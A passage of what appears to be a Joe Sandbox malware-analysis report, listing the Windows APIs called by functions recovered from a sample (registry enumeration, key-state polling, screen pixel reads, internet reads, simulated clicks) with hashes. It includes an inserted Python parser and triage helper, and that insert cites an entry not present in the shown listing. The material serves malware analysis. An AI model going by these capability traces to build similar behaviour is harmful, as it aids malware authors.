                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 826366716-0
                                                                                                                                                                                                                                          • Opcode ID: 7df6e3fc8985e988d1fff119ea5846b70a93ae38ce9739d4d4ed3ea8428a2ea7
                                                                                                                                                                                                                                          • Instruction ID: 19bb140a55200ab4262f30c9429f0afaa9322ebeda187c21bd3648ef0dc3baa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7df6e3fc8985e988d1fff119ea5846b70a93ae38ce9739d4d4ed3ea8428a2ea7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E616A31208241EFD714DF14C890E6ABBE5FF84308F54855DF8A98B2A2DB71ED49CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
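The entries above are the report's plain-text function listing: each one names the Win32 APIs a recovered function calls (directly, or through a sub-function), the memory dump the function was lifted from with its base offset, and similarity hashes. When a report carries thousands of these, a triager wants them as records rather than text. The following is an added example, not Joe Sandbox code and not part of the report: a parser for this layout that turns entries into records, computes each call site's offset from the dump base, and applies a few behaviour rules. The sample input is copied from the registry-enumeration and file-move entries above, trimmed to the fields used; the rules and the reading of the dump "Offset" field as the image base are the author's assumptions.

```python
# Added example: parser and triage helper for Joe Sandbox function-analysis
# text entries. Not Joe Sandbox code; the triage rules and the reading of the
# dump "Offset" as the image base are the author's assumptions.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed input: two entries copied from the report (registry enumeration
# and file move), trimmed to the fields this parser uses.
SAMPLE = """\
APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015BB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0015BB63
• RegCloseKey.ADVAPI32(?,?), ref: 0015BBA6
• RegCloseKey.ADVAPI32(00000000), ref: 0015BBB3
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• Instruction Fuzzy Hash: 1E616A31208241EFD714DF14C890E6ABBE5FF84308F54855DF8A98B2A2DB71ED49CB92
Uniqueness
Uniqueness Score: -1.00%
APIs
• lstrcmpiW.KERNEL32(?,?), ref: 0013E473
• MoveFileW.KERNEL32(?,?), ref: 0013E4AC
• _wcslen.LIBCMT ref: 0013E5EB
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0013E650
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Uniqueness
Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SOURCE_RE = re.compile(r"^\S+\.sdmp, Offset: (?P<base>[0-9A-F]{8})")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                # call-site address inside the dumped image
    subcall: Optional[int]  # callee address when reached through a sub-function

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    image_base: Optional[int] = None  # dump "Offset", read as the image base (assumption)
    fields: Dict[str, str] = field(default_factory=dict)

    def direct_api_names(self) -> Set[str]:
        return {a.name for a in self.apis if a.subcall is None}

def parse_blocks(text: str) -> List[FunctionBlock]:
    blocks: List[FunctionBlock] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if section == "APIs":  # every entry starts with its API list
                blocks.append(FunctionBlock())
            continue
        if not line or not blocks:
            continue
        cur = blocks[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
        elif (m := FIELD_RE.match(line)):
            key, val = m["key"], m["val"].strip()
            src = SOURCE_RE.match(val) if key == "Source File" else None
            if src:
                cur.image_base = int(src["base"], 16)
            else:
                cur.fields[key] = val
    return blocks

def rva(block: FunctionBlock, call: ApiCall) -> int:
    """Call-site offset from the dump base, to find it in the dumped PE."""
    return call.ref - block.image_base

# Triage rules (author's assumptions), matched on directly called APIs only.
RULES: Dict[str, Set[str]] = {
    "registry-key-enumeration": {"RegOpenKeyExW", "RegEnumKeyExW"},
    "remote-registry-connect": {"RegConnectRegistryW"},
    "file-move-or-shell-op": {"MoveFileW", "SHFileOperationW"},
}

def match_rules(block: FunctionBlock) -> List[str]:
    return sorted(r for r, need in RULES.items() if need <= block.direct_api_names())
```

Rules are matched on the directly called APIs only, since the "Part of subcall function" lines belong to a callee and would otherwise make every caller of a string helper look like that helper. The rva() value is what you would look up in the dumped image at 000D0000 to read the call site itself.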

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00138BCD
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00138C3E
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32 ref: 00138C9D
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00138D10
                                                                                                                                                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00138D3B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4136290138-0
                                                                                                                                                                                                                                          • Opcode ID: b82fa4c456c675d7799d291645f4dbc15fe559014fbbebd1c9847e7d425154b6
                                                                                                                                                                                                                                          • Instruction ID: abaa6aed1d271f5fe5d93ab9ce860638f69981582254315ea1f86cecc5ceef39
• Opcode Fuzzy Hash: b82fa4c456c675d7799d291645f4dbc15fe559014fbbebd1c9847e7d425154b6
• Instruction Fuzzy Hash: F15159B5A00219EFCB14CF68C894AAAB7F8FF89310F158559F905DB350EB30E911CBA0
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00148BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00148BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00148C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00148C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00148C5F
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: e23761a8ff94020688d333c9524d82ac561703e2cc5520cb0cba1d1b8f22919d
• Instruction ID: 9f92888c04d4e0aea911af9e59069e210debad24fad7d2679c213e83346561b2
• Opcode Fuzzy Hash: e23761a8ff94020688d333c9524d82ac561703e2cc5520cb0cba1d1b8f22919d
• Instruction Fuzzy Hash: 62514835A00615AFCB04DF65C880AAEBBF5FF48314F088059E849AB362DB71ED41CBA1
Uniqueness
Uniqueness Score: -1.00%
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00158F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00158FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00158FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 00159032
• FreeLibrary.KERNEL32(00000000), ref: 00159052
  • Part of subcall function 000EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00141043,?,7529E610), ref: 000EF6E6
  • Part of subcall function 000EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0012FA64,00000000,00000000,?,?,00141043,?,7529E610,?,0012FA64), ref: 000EF70D
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: b91c44029d8b71e9f04d5d0529bfb7e422b568f20034f0f90ba432d431be76ee
• Instruction ID: 61ae7ba74eaebd74999ff466a863f3fc554146e864d053733dc98c15d59b1f61
• Opcode Fuzzy Hash: b91c44029d8b71e9f04d5d0529bfb7e422b568f20034f0f90ba432d431be76ee
• Instruction Fuzzy Hash: 40513535600205DFCB04DF58C4948ADBBB1FF49325B4580AAE85AAF762DB31ED89CB91
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00166C33
• SetWindowLongW.USER32(?,000000EC,?), ref: 00166C4A
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00166C73
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0014AB79,00000000,00000000), ref: 00166C98
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00166CC7
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: 980a53dbca162bda1b5dfad74d25ccd46429e34abaf6af14eb5d316039d2f5e7
• Instruction ID: c3f2d68af2ab79f2d225a088dd7add160504a7152219b6a9926282afa4b5c691
• Opcode Fuzzy Hash: 980a53dbca162bda1b5dfad74d25ccd46429e34abaf6af14eb5d316039d2f5e7
• Instruction Fuzzy Hash: 6341B435604504AFDB24CF28CC58FBA7BA5EB0A350F154268F899A73E0C371AD61DA90
Uniqueness
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 4a78a0c3407c58890c9c16fad4b1def822325ed29001be1a315fbd6eeab5d1a5
• Instruction ID: 99d03fbf69ab24476dbe6128cc7be26d88ac4b654bc8f212bc2a192e93a8548b
• Opcode Fuzzy Hash: 4a78a0c3407c58890c9c16fad4b1def822325ed29001be1a315fbd6eeab5d1a5
• Instruction Fuzzy Hash: F541E236A002049FCB24DF78C884A6DB3F5EF89314F1545A9E655EB396DB71AD01CB80
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetCursorPos.USER32(?), ref: 000E9141
• ScreenToClient.USER32(00000000,?), ref: 000E915E
• GetAsyncKeyState.USER32(00000001), ref: 000E9183
• GetAsyncKeyState.USER32(00000002), ref: 000E919D
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                                                                                          • Opcode ID: 67bf3fe6ff516e39ab500dc241b83f6e2887c2a42ff0cd8adff359b1629f2dcd
                                                                                                                                                                                                                                          • Instruction ID: b938baf75a1f8d12e2a314ecfd83de4db4068f60f621e5942b87cf1b44ec5e0b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67bf3fe6ff516e39ab500dc241b83f6e2887c2a42ff0cd8adff359b1629f2dcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F416D31A0865AFFDF199F65D848BEEB774FF05320F20825AE429A32D0C7706960CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 001438CB
                                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00143922
                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0014394B
                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00143955
                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00143966
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2256411358-0
                                                                                                                                                                                                                                          • Opcode ID: 28c12123f213b6de0a1f6fe64771bdd06aaf6a8d665d0198c5b9c7caf5fa4ea3
                                                                                                                                                                                                                                          • Instruction ID: 1c0ebd25e2dcf4643ff86429cca7cd077a4101c244756d3b4c5caff704dbe8cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c12123f213b6de0a1f6fe64771bdd06aaf6a8d665d0198c5b9c7caf5fa4ea3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD319370904342AEEB39CB35DC49BB777A8AB16308F04456DE4B2C29B0E7F49AC5CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0014CF38
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0014CF6F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,0014C21E,00000000), ref: 0014CFB4
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0014C21E,00000000), ref: 0014CFC8
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0014C21E,00000000), ref: 0014CFF2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                                                                                          • Opcode ID: ea2b0466d31de983ac290d17c6ed251034fcebcf506ea66ef93601dc0b559107
                                                                                                                                                                                                                                          • Instruction ID: f6e7d70cb0107a351f7defc3587aa06c33c9d00fcdd1515d81bc3eafef38cd6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2b0466d31de983ac290d17c6ed251034fcebcf506ea66ef93601dc0b559107
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B318E71605206EFDB64DFA5CC84ABBBBF9EB14310B10442EF506E2121DB74AE45DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00131915
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 001319C1
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 001319C9
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 001319DA
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001319E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                                                                                          • Opcode ID: c7dfb406b87df8620a35c7e6aa184a882667a41010467c01bd3633a62d47449e
                                                                                                                                                                                                                                          • Instruction ID: db23624be19df6f15db40e6e187ea2833238d4b6a099bffc7103e9a7551f9116
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7dfb406b87df8620a35c7e6aa184a882667a41010467c01bd3633a62d47449e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631A271900219FFDB04CFA8CD99BEE7BB5EB45319F104225F961A72D1C7B09954CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00165745
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0016579D
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001657AF
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001657BA
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00165816
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: 7f50e33b97fc833d6e9c0f9bf765547d4b122d40188018cf65bcb79cb905bf98
• Instruction ID: eaf9f26b91d7a3b6ea89d672deea2622f9c1b6772e237cde4168125689058d91
• Opcode Fuzzy Hash: 7f50e33b97fc833d6e9c0f9bf765547d4b122d40188018cf65bcb79cb905bf98
• Instruction Fuzzy Hash: B1219671904618DADB209FA0CC85AFE7BB9FF04724F108256F929EB1C1E7709995CF50
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000000), ref: 00150951
• GetForegroundWindow.USER32 ref: 00150968
• GetDC.USER32(00000000), ref: 001509A4
• GetPixel.GDI32(00000000,?,00000003), ref: 001509B0
• ReleaseDC.USER32(00000000,00000003), ref: 001509E8
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: a8ab68218141408ffadaf3bfcd5e9c1e43dc239d599a809f908bf0530ff1d337
• Instruction ID: bbf156b6666c4979c92c7ef331f819d44471c8fba55cf441d68faf5c2f213db6
• Opcode Fuzzy Hash: a8ab68218141408ffadaf3bfcd5e9c1e43dc239d599a809f908bf0530ff1d337
• Instruction Fuzzy Hash: 32218135600204EFD704EF65DC84AAEBBE5FF58701F048069E85AE7762CB70AC44CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0010CDC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010CDE9
  • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0010CE0F
• _free.LIBCMT ref: 0010CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010CE31
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: c6f215fb47acdb34f24edec2c7660a4239c488bf71e299ed7515e5218af56d28
• Instruction ID: 5939dccbc71fa39f912555309d4bf81e96c36b1d4be49be83954f00f4e9476b8
• Opcode Fuzzy Hash: c6f215fb47acdb34f24edec2c7660a4239c488bf71e299ed7515e5218af56d28
• Instruction Fuzzy Hash: A30184726012157FA32127BAAC8CD7F6D6DEFC6BA13154229FD85C7281EBE18D0199F0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E9693
• SelectObject.GDI32(?,00000000), ref: 000E96A2
• BeginPath.GDI32(?), ref: 000E96B9
• SelectObject.GDI32(?,00000000), ref: 000E96E2
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: f0ae4df603f56c7568227138d178eee8ad591d85f6fca9c5a7b3cfa4dc27c516
• Instruction ID: 29c22a4d839ac5c46d4cf5b3494ba73c1097ddd1d7a7572c5d8d51dd1fc8136c
• Opcode Fuzzy Hash: f0ae4df603f56c7568227138d178eee8ad591d85f6fca9c5a7b3cfa4dc27c516
• Instruction Fuzzy Hash: 00219F70802385FFDB119F26EC187BE7BA9BB02359F104216F450A65B0D3B099D1CF94
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 317606c1ae7c4ee49f5cc97b777d8606ab7d3d9b10c0b99adb22d352dcc3ce6d
• Instruction ID: 7fecf5036287285e7eab0f8f5c0c93e9e69f08d9761ea12679f1930ee6cb35b3
• Opcode Fuzzy Hash: 317606c1ae7c4ee49f5cc97b777d8606ab7d3d9b10c0b99adb22d352dcc3ce6d
• Instruction Fuzzy Hash: E801B571645609FBD3085510AD83FFB735F9B31BA4F814024FE049A642F760EE21D2E0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,000FF2DE,00103863,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6), ref: 00102DFD
• _free.LIBCMT ref: 00102E32
• _free.LIBCMT ref: 00102E59
• SetLastError.KERNEL32(00000000,000D1129), ref: 00102E66
• SetLastError.KERNEL32(00000000,000D1129), ref: 00102E6F
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                          • Opcode ID: fbfb25961aab58300b802cffaab2373bd499910586e49b02e1fe7bfa246ced80
                                                                                                                                                                                                                                          • Instruction ID: 44e32bc46f9ba92c2ea773afc8b6267a98956a67d37fc4a1a335cf24829c0b8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbfb25961aab58300b802cffaab2373bd499910586e49b02e1fe7bfa246ced80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A201283628560067C6227774AC4DD3B265DBFE53B5B314029F8E5A32D2EFF08C414160
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?,?,0013035E), ref: 0013002B
                                                                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0012FF41,80070057,?,?), ref: 00130046
